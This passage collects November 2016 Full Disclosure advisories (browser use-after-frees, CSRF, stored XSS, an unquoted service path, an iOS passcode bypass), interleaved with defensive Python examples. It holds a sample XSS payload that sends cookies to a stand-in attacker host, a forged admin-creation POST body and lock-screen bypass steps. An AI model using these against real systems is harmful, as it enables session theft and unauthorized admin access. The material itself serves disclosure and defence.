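<link rel="stylesheet" href="https://cdn.example.net/fonts.css">
</head><body>Hello</body></html>
"""


def resolve_stylesheet(page_url: str, href: str) -> str:
    """Resolve href against the document URL exactly as a browser does."""
    return urljoin(page_url, href)


def script_path(page_path: str) -> str:
    """Path of the executing script: everything up to the first '.php' segment.
    Any segments after it are PATH_INFO and are served by that same script."""
    segments = page_path.split("/")
    for i, seg in enumerate(segments):
        if seg.endswith(".php"):
            return "/".join(segments[: i + 1])
    return page_path


def rpo_possible(page_url: str, href: str) -> bool:
    """True when the resolved stylesheet URL lands *under* the page's script,
    i.e. the request for 'CSS' is answered by the page itself (RPO)."""
    resolved_path = urlsplit(resolve_stylesheet(page_url, href)).path
    return resolved_path.startswith(script_path(urlsplit(page_url).path) + "/")


class _StylesheetLinks(HTMLParser):
    """Collect hrefs of <link rel=stylesheet> that are neither absolute URLs
    nor root-relative paths; those are the ones an attacker can re-base."""

    def __init__(self):
        super().__init__()
        self.relative = []

    def handle_starttag(self, tag, attrs):
        if tag != "link":
            return
        a = dict(attrs)
        if "stylesheet" in (a.get("rel") or "").lower():
            href = a.get("href") or ""
            parts = urlsplit(href)
            if not parts.scheme and not parts.netloc and not href.startswith("/"):
                self.relative.append(href)


def relative_stylesheets(markup: str) -> list:
    parser = _StylesheetLinks()
    parser.feed(markup)
    return parser.relative
```

The fix is the one the resolution shows: emit root-relative or absolute stylesheet URLs (or a <base> element), and have the script refuse or redirect requests that carry unexpected PATH_INFO so it never answers under its own name.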

[FD] Microsoft Internet Explorer 11 iertutil LCIEGetTypedComponentFromThread use-after-free details

2016-11-18 Thread Berend-Jan Wever
Throughout November, I plan to release details on vulnerabilities I
found in web-browsers which I've not released before. This is the
thirteenth entry in that series. Unfortunately I won't be able to
publish everything within one month at the current rate, so I may
continue to publish these through December and January.

The below information is available in more detail on my blog at
http://blog.skylined.nl/20161117001.html.

Follow me on http://twitter.com/berendjanwever for daily browser bugs.

Microsoft Internet Explorer 11 iertutil LCIEGetTypedComponentFromThread
use-after-free
===
(The fix and CVE number for this issue are unknown)

Synopsis

A specially crafted web-page can cause the iertutil.dll module of
Microsoft Internet Explorer 11 to free some memory while it still holds
a reference to this memory. The module can be made to use this reference
after the memory has been freed. Unlike many use-after-free bugs in
MSIE, this issue, and apparently all code in this module, is not
mitigated by MemGC. This issue appears to have been addressed in July
2016, as it failed to reproduce after the July security updates were
installed.


Known affected software, attack vectors and mitigation
--
+ Microsoft Internet Explorer 11

  An attacker would need to get a target user to open a specially
  crafted web-page and allow the web-page to open a popup. The target
  user may need to run MSIE in the non-default single process mode.
  Disabling JavaScript should prevent an attacker from triggering the
  vulnerable code path.

Description
---
This looks like a pretty straightforward use-after-free, but I did not
investigate at what point in the repro the memory gets freed and when it
gets re-used, so I do not know if an attacker has any chance to force
reallocation of the freed memory before reuse.

The issue can be triggered with MemGC enabled; the object that is freed
does not appear to be protected by MemGC.

The repro requires that MSIE is run in single-process mode in order to
trigger the use-after-free. It is not known if it is possible to tweak
the repro to have MSIE take a similar code-path that leads to a
use-after-free when MSIE is not in single-process mode.

MSIE can be started in single process mode by setting the following
registry key before starting MSIE:

`HKCU\Software\Microsoft\Internet Explorer\Main\TabProcGrowth = DWORD:0`

To revert this change, remove the registry key or set the value to 1 and
restart MSIE.

Exploit
---
A number of factors appear to be getting in the way of creating a usable
exploit for this issue:
* I did not investigate if it is possible to reproduce the issue without
  opening a pop-up to make it exploitable in the presence of a pop-up
  blocker.
* I did not investigate if it is possible to reproduce the issue without
  running MSIE in single-process mode to exploit it on a system with
  default settings.
* I did not investigate if it is possible to reallocate the freed memory
  between the free and the use-after-free in order to modify control
  flow.
Because there are so many things that would need to be investigated in
order to write an exploit, I felt it was not cost-effective for me to do so.

Time-line
-
* July 2016: This vulnerability was found through fuzzing.
* July 2016: This vulnerability was submitted to ZDI and iDefense.
* July 2016: ZDI reports they are unable to reproduce the issue.
* November 2016: Details of this issue are released.

Cheers,
SkyLined



[FD] CVE-2015-2482 MSIE 8 jscript RegExpBase::FBadHeader use-after-free details

2016-11-18 Thread Berend-Jan Wever
Throughout November, I plan to release details on vulnerabilities I
found in web-browsers which I've not released before. This is the
twelfth entry in that series. Unfortunately I won't be able to publish
everything within one month at the current rate, so I may continue to
publish these through December and January.

The below information is available in more detail on my blog at
http://blog.skylined.nl/20161116001.html.

Follow me on http://twitter.com/berendjanwever for daily browser bugs.

MSIE 8 jscript RegExpBase::FBadHeader use-after-free
===
(MS15-018, CVE-2015-2482)

Synopsis

A specially crafted web-page can cause the Javascript engine of
Microsoft Internet Explorer 8 to free memory used for a string. The code
will keep a reference to the string and can be forced to reuse it when
compiling a regular expression.

Known affected software, attack vectors and mitigations
---
* Microsoft Internet Explorer 8
  An attacker would need to get a target user to open a specially
  crafted web-page. Disabling Javascript should prevent an attacker
  from triggering the vulnerable code path.

Description
---
Recompiling the regular expression pattern during a replace can cause
the code to reuse a freed string, but only if the string is freed from
the cache by allocating and freeing a number of strings of certain size,
as explained by Alexander Sotirov in his Heap Feng-Shui presentation.

Exploit
---
Exploitation was not investigated.

Time-line
-
* *March 2015*: This vulnerability was found through fuzzing.
* *March 2015*: This vulnerability was submitted to ZDI.
* *April 2015*: This vulnerability was acquired by ZDI.
* *October 2015*: Microsoft addressed this issue in MS15-018.
* *November 2016*: Details of this issue are released.

Cheers,

SkyLined



[FD] CVE request - Samsung Mobile Phone SVE-2016-6343: Unauthorized API access via system service call

2016-11-18 Thread 0xr0ot
Hi,

I'd like to request a CVE for the following vulnerability, fixed in November 2016.

Fix:
http://security.samsungmobile.com/smrupdate.html#SMR-NOV-2016

Description of the security vulnerability:

Severity: Medium
Affected versions: M(6.0)
Reported on: May 26, 2016
Disclosure status: Privately disclosed.
The vulnerability, which allows unauthorized access to system APIs from a
system service with improper access control, enables attackers to control the
device screen.
The patch adds access control checks.

Best Regards,
0xr0ot(行之)


[FD] Reason Core Security v1.2.0.1 - Unquoted Path Privilege Escalation Vulnerability

2016-11-18 Thread Vulnerability Lab
Document Title:
===
Reason Core Security v1.2.0.1 - Unquoted Path Privilege Escalation Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2003


Release Date:
=
2016-11-14


Vulnerability Laboratory ID (VL-ID):

2003


Common Vulnerability Scoring System:

4


Product & Service Introduction:
===
Reason Core Security is an anti-malware program designed by developers 
HerdProtect.  This program is intended for use 
with your existing antivirus software and acts as a second layer of defense in 
the event that the malware slips past the 
real-time protection of your antivirus program.

(Copy of the Vendor Homepage: https://www.reasoncoresecurity.com/ )


Abstract Advisory Information:
==
An independent Vulnerability Laboratory researcher discovered an unquoted 
service path privilege escalation vulnerability in the Reason Core Security 
anti-virus software.


Vulnerability Disclosure Timeline:
==
2016-11-14: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

HerdProtect
Product: Reason Core Security - Software 1.2.0.1


Exploitation Technique:
===
Local


Severity Level:
===
Medium


Technical Details & Description:

The application suffers from an unquoted search path issue in the official 
Reason Core Security v1.2.0.1 anti-virus software. 
The issue allows authorized but unprivileged local users to execute arbitrary 
code with system privileges on the active system. 
The attack vector of the vulnerability is local.


Proof of Concept (PoC):
===
The issue can be exploited by local attackers with a restricted system user 
account or network access and without user interaction.
For security demonstration or to reproduce the vulnerability, follow the 
provided information and steps below.

-- PoC Exploitation --
C:\Program Files\ReasonSecurity>sc qc rsEngineSvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: rsEngineSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\ReasonSecurity\rsEngineSvc.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Reason Core Security Engine Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem


Security Risk:
==
The security risk of the local service path privilege escalation vulnerability 
in the antivirus software is estimated as medium. (CVSS 4.0)


Credits & Authors:
==
ZwX -  (http://zwx.fr/)  [http://www.vulnerability-lab.com/show.php?user=ZwX]


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential 
loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability mainly for 
consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any licenses, policies, 
deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
- www.evolution-sec.com
Section:magazine.vulnerability-lab.com  - 
vulnerability-lab.com/contact.php - 
evolution-sec.com/contact
Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab 
- youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php- 
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php- 
vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file, 
resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, 
advisories, source code, videos and oth
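To check a Windows host for the class of issue described above, the configured binary path of each service can be read with `sc qc` as the post does, but the decision has to be made mechanically: a path is only hijackable if it is not wrapped in quotes, contains a space before the executable name, and an unprivileged user can create a file in one of the directories the service control manager tries first. The Python below is an added example, not the researcher's tooling, that parses `sc qc` output and lists the candidate paths CreateProcess would try in order. The input is constructed: the first block reproduces the service configuration as printed in the post (where BINARY_PATH_NAME is shown in quotes), the second is a made-up service with an unquoted path. The writable-directory test is left to the operator (icacls or Get-Acl), since os.access on Windows does not reflect ACLs.

```python
import re

# Constructed sample (not a real capture): block one copies the configuration
# printed in the post above; block two is an invented service with an
# unquoted path that contains spaces.
SC_QC_OUTPUT = r"""
SERVICE_NAME: rsEngineSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : "C:\Program Files\ReasonSecurity\rsEngineSvc.exe"
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME: ExampleUpdater
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files\Example Vendor\Update Service\updater.exe -service
        SERVICE_START_NAME : LocalSystem
"""

_NAME = re.compile(r"^\s*SERVICE_NAME:\s*(\S+)", re.M)
_PATH = re.compile(r"^\s*BINARY_PATH_NAME\s*:\s*(.+?)\s*$", re.M)


def parse_sc_qc(text: str) -> dict:
    """Map service name -> BINARY_PATH_NAME string, one block per service."""
    services = {}
    for block in re.split(r"\n(?=\s*SERVICE_NAME:)", text.strip()):
        name = _NAME.search(block)
        path = _PATH.search(block)
        if name and path:
            services[name.group(1)] = path.group(1)
    return services


def search_candidates(binary_path: str) -> list:
    """Paths CreateProcess tries, in order, for an unquoted path with spaces:
    each space-delimited prefix with ".exe" appended, then the real path.
    Returns [] when the path is quoted or contains no space (not affected)."""
    if binary_path.startswith('"'):
        return []
    end = binary_path.lower().find(".exe")
    if end == -1:
        return []
    exe_path = binary_path[: end + 4]        # drop any arguments after the .exe
    words = exe_path.split(" ")
    if len(words) == 1:
        return []
    return [" ".join(words[:i]) + ".exe" for i in range(1, len(words))] + [exe_path]


def unquoted_services(text: str) -> dict:
    """Services whose path could be hijacked, mapped to the file names an
    attacker would need to plant (the real executable path is excluded)."""
    result = {}
    for name, path in parse_sc_qc(text).items():
        candidates = search_candidates(path)
        if candidates:
            result[name] = candidates[:-1]
    return result
```

Each listed candidate is only exploitable if its parent directory is writable by the attacker; on a default Windows install C:\ and C:\Program Files are not, which is why the directory ACL check is the decisive step and belongs in any report of this issue class.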

[FD] EditMe CMS - CSRF Privilege Escalation Web Vulnerability

2016-11-18 Thread Vulnerability Lab
Document Title:
===
EditMe CMS - CSRF Privilege Escalation Web Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=1996


Release Date:
=
2016-11-14


Vulnerability Laboratory ID (VL-ID):

1996


Common Vulnerability Scoring System:

2.8


Product & Service Introduction:
===
EditMe is a framework that serves as a Platform as a Service to build custom 
Web Applications, Web Prototyping, and Web CMS.
A CMS in which any page can be a server-side script that implements whatever 
dynamic functionality you dream up. That's EditMe. No FTP servers, compilers or 
IDEs required. EditMe's API uses server-side JavaScript and our templates use 
XML, so there are no new languages to learn.

(Copy of the Vendor Homepage: http://www.editme.com/ )


Abstract Advisory Information:
==
An independent Vulnerability Laboratory researcher discovered a CSRF privilege 
escalation web vulnerability in the official EditMe content management system.


Vulnerability Disclosure Timeline:
==
2016-11-14: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details & Description:

A cross site request forgery vulnerability has been discovered in the official 
EditMe content management system.
The vulnerability allows malicious client-side web-application requests to 
execute non-protected functions 
within the victim's own web context.

In the absence of a security token, an attacker could execute arbitrary code in 
the administrator's browser to gain 
unauthorized access to the administrator's access privileges.


Proof of Concept (PoC):
===
The cross site request forgery web vulnerability can be exploited by a malicious 
web application without a privileged user account and without user interaction.
For security demonstration or to reproduce the CSRF web vulnerability, follow 
the provided information and steps below.


--- PoC: CSRF Exploitation ---

Privilege Escalation CSRF Vulnerability
(HTML form, markup not preserved in this copy, that posts to
http://pentest.editme.com/_Register with method="post"; the only surviving
field value is "Administrator")

--- PoC Session Logs [POST]---
Status: 200 [OK]
Host: pentest.editme.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: __utma=164978144.641387690.1478254033.1478262268.1478328738.3; 
__utmz=164978144.1478328738.3.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
 km_lv=x; km_ai=i3E6P9IiO690CMxX353C5RCJAVY%3D; km_uq=; 
__utma=1.330307796.1478254213.1478254213.1478329355.2; 
__utmz=1.1478254213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 
__utmb=164978144.3.10.1478328738; __utmc=164978144; 
JSESSIONID=377D65CA3361D7998A1173C97420C846; visited=" Home 404"; 
__utmb=1.24.10.1478329355; __utmc=1; __utmt=1; editme-user=admin; 
editme-key="ECiu7PBk57GYeaLPUxHeDw=="
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 153
-
POST Method: 
mode=AdminAdd&redirect=&user-groupname=A&user-username=VulnerabilityLab&user-password=1234&user-password2=1234&user-email=tested%40live.fr&regSubmit=Save



Security Risk:
==
The security risk of the client-side cross site request forgery web 
vulnerability in the application is estimated as medium. (CVSS 2.8)


Credits & Authors:
==
ZwX -  (http://zwx.fr/)  [http://www.vulnerability-lab.com/show.php?user=ZwX]


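The EditMe finding above, like the MyLittleForum CSRF finding earlier on this page, comes down to the server accepting a state-changing POST on the strength of the session cookie alone. The Python below is an added example, not code from either product: it issues a per-session token bound to the session identifier with an HMAC, embeds it in the form, and refuses any POST whose token is missing, expired or forged, comparing in constant time; the Origin header is checked as an independent second control. The request objects are constructed dicts, and SERVER_SECRET, the session ids and the site origin are placeholders.

```python
import hashlib
import hmac
import secrets
import time
from typing import Optional

# Assumed server-side values (placeholders, not EditMe or MyLittleForum config).
SERVER_SECRET = secrets.token_bytes(32)    # in practice loaded from configuration
SITE_ORIGIN = "https://forum.example.com"
TOKEN_TTL_SECONDS = 3600


def issue_csrf_token(session_id: str, now: Optional[int] = None) -> str:
    """Token = timestamp.HMAC(secret, session_id|timestamp).

    Binding the MAC to the session id means a token minted in, or captured
    from, the attacker's own session is useless against the victim's session.
    The token is rendered into the admin form as a hidden field.
    """
    ts = str(int(time.time() if now is None else now))
    mac = hmac.new(SERVER_SECRET, f"{session_id}|{ts}".encode(), hashlib.sha256).hexdigest()
    return f"{ts}.{mac}"


def verify_csrf_token(token: str, session_id: str, now: Optional[int] = None) -> bool:
    """True only for a well-formed, unexpired token whose MAC matches this session."""
    try:
        ts, mac = token.split(".", 1)
        age = (time.time() if now is None else now) - int(ts)
    except ValueError:
        return False
    if age < 0 or age > TOKEN_TTL_SECONDS:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}|{ts}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def handle_add_user(request: dict, now: Optional[int] = None) -> str:
    """Guard for an admin 'add user' action such as mode=AdminAdd above.

    `request` is a constructed dict with keys 'method', 'cookies', 'form' and
    optionally 'origin'; a real framework would supply the same data.
    """
    if request["method"] != "POST":
        return "405 method not allowed"
    session_id = request["cookies"].get("session", "")
    token = request["form"].get("csrf_token", "")
    if not session_id or not verify_csrf_token(token, session_id, now):
        return "403 forbidden: bad csrf token"
    # Independent second check: a cross-site form post carries the attacker's
    # Origin; when the header is present it must be our own origin.
    origin = request.get("origin")
    if origin is not None and origin != SITE_ORIGIN:
        return "403 forbidden: cross-origin request"
    return f"200 created user {request['form']['user-username']}"
```

The forged request an attacker's page can produce has the victim's cookie but no token and a foreign Origin, so it fails the first check; even a page that somehow learned a token from its own session fails because the MAC is keyed to the victim's session id.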

[FD] Habari CMS v0.9.2 - (Backend Comments) XSS Vulnerability

2016-11-18 Thread Vulnerability Lab
Document Title:
===
Habari CMS v0.9.2 - (Backend Comments) XSS Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=1999


Release Date:
=
2016-11-09


Vulnerability Laboratory ID (VL-ID):

1999


Common Vulnerability Scoring System:

3.5


Product & Service Introduction:
===
While there are a number of technical reasons that highlight the differences 
and advantages Habari has over other 
blogging packages, a major component of what makes Habari different is its 
community participation model.

(Copy of the Homepage:  http://habariproject.org/en )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a persistent cross 
site scripting vulnerability in the Habari v0.9.2 content management system.


Vulnerability Disclosure Timeline:
==
2016-11-09: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Habari
Product: Habari - Content Management System 0.9.2


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details & Description:

A persistent cross site scripting web vulnerability has been discovered in the 
official Habari CMS v0.9.2.
The vulnerability allows remote attackers to inject their own malicious script 
code on the application side of affected 
web modules or service functions.

The persistent cross site scripting web vulnerability is located in the `name` 
parameter of the `comments` module.
Remote attackers without privileged web-application user accounts are able to 
inject malicious script code into the 
comments backend. This allows remote attackers to execute script code on 
preview of the comments section for 
administrators in the application backend. The attack vector of the issue is 
persistent and the request method to 
inject the malicious comments is POST. The vulnerability is a classic cross 
site scripting issue that affects the 
backend to compromise administrator accounts.

The security risk of the issue is estimated as medium with a cvss (common 
vulnerability scoring system) count of 3.5. 
Exploitation of the web vulnerability requires no privileged web-application 
user account and only low user interaction. 
Successful exploitation of the vulnerability results in persistent phishing 
attacks, session hijacking, persistent 
external redirect to malicious sources and persistent manipulation of affected 
or connected web module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Feedback - Comments

Vulnerable Parameter(s):
[+] comment_name

Affected Module(s):
[+] Backend - Comments 


Proof of Concept (PoC):
===
The vulnerability can be exploited by remote attackers without a user account 
and with low user interaction.
For security demonstration or to reproduce, follow the provided information and 
steps below.


Manual steps to reproduce the vulnerability ...
1. Open the application with an article
2. Write a comment and include a script code payload as the name of the comment
3. Save to submit via POST method request
Note: Now the attacker waits until the admin views the comments
4. The malicious script code payload executes on visiting the comments module 
in the backend
5. Successfully reproduced the remote vulnerability!


Injection Point: http://habari.localhost:8080/habari/habari#comment-form

Execution Point: http://habari.localhost:8080/habari/admin/comment?id


PoC: Exploitation (comment_name)

(HTML of the backend comment listing, markup not preserved in this copy; the
surviving text is shown below)

http://test.de/" rel="external"><[PAYLOAD EXECUTION VIA NAME OF THE COMMENTS INPUT!]>

test message by pentester

2016-11-05 8:05 pm

--- PoC Session Logs [POST] ---
Status: 302 [Found]
POST http://habari.localhost:8080/habari/1/d647f75a71/feedback 
Mime Type: [text/html]
   Request Header:
      Host[habari.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0]
      Referer[http://habari.localhost:8080/habari/habari]
      Cookie[comment_f1d6f9c9f31f8745f650f82892e5d607a4c1cf15=+%2520%3E%22%23sdasd%40gmail.com%23http%3A%2F%2Fsadasd.de%2F; g3sid=13e938f0028945d17f32c164f7a9d904f84dfe8e%7E8br7cg0v7kr8mqut1q256vq542; _pk_id.2.bb5e=8b2f85bd26c204d7.1478373106.1.1478376901.1478373106.; _pk_ref.2.bb5e=%5B%22%22%2C%22%22%2C1478373106%2C%22http%3A%2F%2Fwww.localhost:8080%2Fdemo%2F1%2F343%2FGallery%22%5D; _pk_ses.2.bb5e=*; PHPSESSID=pau398b2k2gpsafkbh0pdhjvk7; style=light]
      Connection[keep-alive]
      Upgrade-Insecure-Requests[1]
   POST data:
      FormUI[d4ce1bda87af8f173f916f9216dfe2fc]
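The Habari finding above and the first Mezzanine finding earlier on this page (XSS 1, author name in the comment overview) are the same bug: a commenter's name is stored verbatim and later written into the admin page without encoding. The Python below is an added example, not code from either project. It renders a constructed comment row the unsafe way and the safe way and parses both results, which makes the payload shape visible: a name that starts with '"> closes an attribute value before opening a tag, so encoding must cover quotes (html.escape with quote=True) as well as angle brackets, and must be applied at output time in the context where the value lands. The comment dict and the attacker host are constructed.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample comment, shaped like the PoCs above: only the "name" field
# carries the payload; the URL and body are benign. attacker.invalid is a
# placeholder host.
COMMENT = {
    "name": "'\"><script>document.location='http://attacker.invalid/?c='+document.cookie</script>",
    "url": "http://test.de/",
    "body": "test message by pentester",
}


def render_row_unsafe(comment: dict) -> str:
    """Reproduces the bug: stored fields are concatenated into markup verbatim."""
    return (
        f'<tr><td><a href="{comment["url"]}" title="{comment["name"]}">'
        f'{comment["name"]}</a></td><td>{comment["body"]}</td></tr>'
    )


def render_row_safe(comment: dict) -> str:
    """Encode every untrusted value for the context it lands in.

    html.escape(quote=True) is correct for both text nodes and double-quoted
    attribute values; the href is additionally limited to http(s) so an
    attacker-chosen javascript: URL cannot become a clickable link.
    """
    name = html.escape(comment["name"], quote=True)
    body = html.escape(comment["body"], quote=True)
    url = comment["url"] if re.match(r"^https?://", comment["url"], re.I) else "#"
    url = html.escape(url, quote=True)
    return f'<tr><td><a href="{url}" title="{name}">{name}</a></td><td>{body}</td></tr>'


class _TagCollector(HTMLParser):
    """Record start tags in document order, as a browser's tokenizer would see them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(markup: str) -> list:
    """Start tags a parser finds in the markup; a 'script' entry means the
    rendering created an executable element out of the comment name."""
    parser = _TagCollector()
    parser.feed(markup)
    return parser.tags
```

The parse-based check is the one worth keeping in a test suite: asserting that the rendered backend page yields no tag the template did not put there catches this class of bug regardless of which field or payload shape is used.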
  

[FD] Apple iOS 10.1 - Multiple Access Permission Vulnerabilities

2016-11-18 Thread Vulnerability Lab
Document Title:
===
Apple iOS 10.1 - Multiple Access Permission Vulnerabilities


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2012

Apple Security ID: 648680301

Video1: https://www.youtube.com/watch?v=fY2Obtxk_Dg
Video2: https://www.youtube.com/watch?v=46CHjQxkKxk


Release Date:
=
2016-11-17


Vulnerability Laboratory ID (VL-ID):

2012


Common Vulnerability Scoring System:

6.3


Product & Service Introduction:
===
iOS is a mobile operating system created and developed by Apple Inc. 
exclusively for its hardware. It is the operating 
system that presently powers many of the company's mobile devices, including 
the iPhone, iPad, and iPod touch.

(Copy of the Homepage: https://en.wikipedia.org/wiki/IOS )


Abstract Advisory Information:
==
The Vulnerability Laboratory core research team discovered a local passcode 
bypass via access permission vulnerability in the official Apple iOS v10.1 for 
iPhones and iPads.


Vulnerability Disclosure Timeline:
==
1.1
2016-09-23: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2016-10-01: Vendor Notification (Apple Product Security Team)
2016-11-15: Vendor Response/Feedback (Apple Product Security Team)
2016-**-**: Vendor Fix/Patch (Apple Product Security Team)
2016-**-**: Security Acknowledgements (Apple Product Security Team)
2016-11-16: Public Disclosure (Vulnerability Laboratory)

1.2
2016-09-23: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2016-10-01: Vendor Notification (Apple Product Security Team)
2016-11-15: Vendor Response/Feedback (Apple Product Security Team)
2016-**-**: Vendor Fix/Patch (Apple Product Security Team)
2016-**-**: Security Acknowledgements (Apple Product Security Team)
2016-11-16: Public Disclosure (Vulnerability Laboratory)


1.3
2016-09-01: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2016-09-07: Vendor Notification (Apple Product Security Team)
2016-11-15: Vendor Response/Feedback (Apple Product Security Team)
2016-**-**: Vendor Fix/Patch (Apple Product Security Team)
2016-**-**: Security Acknowledgements (Apple Product Security Team)
2016-11-16: Public Disclosure (Vulnerability Laboratory)

1.4
2016-09-23: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2016-10-01: Vendor Notification (Apple Product Security Team)
2016-11-15: Vendor Response/Feedback (Apple Product Security Team)
2016-**-**: Vendor Fix/Patch (Apple Product Security Team)
2016-**-**: Security Acknowledgements (Apple Product Security Team)
2016-11-16: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Apple
Product: iOS 10.0 & 10.1


Exploitation Technique:
===
Local


Severity Level:
===============
High


Technical Details & Description:
================================
A local passcode bypass via access permission vulnerability in the official
Apple iOS v10.1 for iPhones and iPads.
The iOS access permission vulnerability allows a local attacker to gain
unauthorized access to the internal device data.

The same type of issue has been detected multiple times within the new update
version 10.0 and the follow-up 10.1.
To explain the different types of issues we split the information into 3
different parts.

1. Dictation to Share Access Permission via incompatible Device
The vulnerability is located after installation of the iOS 10.x version on the
incompatible Apple iPad 2 device.
The Apple website showed us that incompatible devices can cause unexpected
behaviour on usage, so we decided to install the version on one of our test
environment devices. After the installation we noticed that the dictionary
function became available ahead of the desk. In our testing we used the
function to trigger a glitch when accessing the more information button in the
locked device mode. After processing the interaction manually in a loop, we
were able to get a push magnifying glass preview ahead of the passcode screen
area. Watching the bug displayed information of a restricted area that is
located in `Device - Siri - About Siri & Data Security to Privacy`. Now I moved
to the link by blindly searching for the location and pushed twice to receive
the input menu bar like when marking a text. People that are aware of iOS know
that these functions allow several options depending on the input and
connected function. Now an attacker can use the share function that became
visible ahead during the passcode lock screen via the glitch and pushes the
share button. Now the email opens. Then the attacker marks the email of the
contact and pushes twice the contact plus a keyboard letter of an existing
contact. Now the contact comes ahead; click the info button and move to the
profile location.
Add the informat